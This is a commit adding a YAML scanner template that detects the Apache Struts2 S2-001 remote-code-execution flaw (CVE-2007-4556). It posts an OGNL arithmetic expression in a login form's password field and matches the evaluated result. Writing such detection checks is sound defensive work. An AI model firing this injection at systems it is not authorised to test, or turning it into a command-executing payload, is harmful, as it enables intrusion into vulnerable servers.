add CVE-2007-4556

cves/2007/CVE-2007-4556.yaml

@@ -0,0 +1,29 @@
+id: CVE-2007-4556
+
+info:
+  name: Apache Struts2 S2-001 RCE
+  author: pikpikcu
+  severity: critical
+  reference: https://www.guildhab.top/?p=2326
+  tags: cve, cve2007,apache,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/login.action"
+    headers:
+        Content-Type: application/x-www-form-urlencoded
+    body: |
+        username=test&password=%25%7B123456789*987654321%7D
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "-67153019"
+        condition: and
+
+      - type: status
+        status:
+          - 200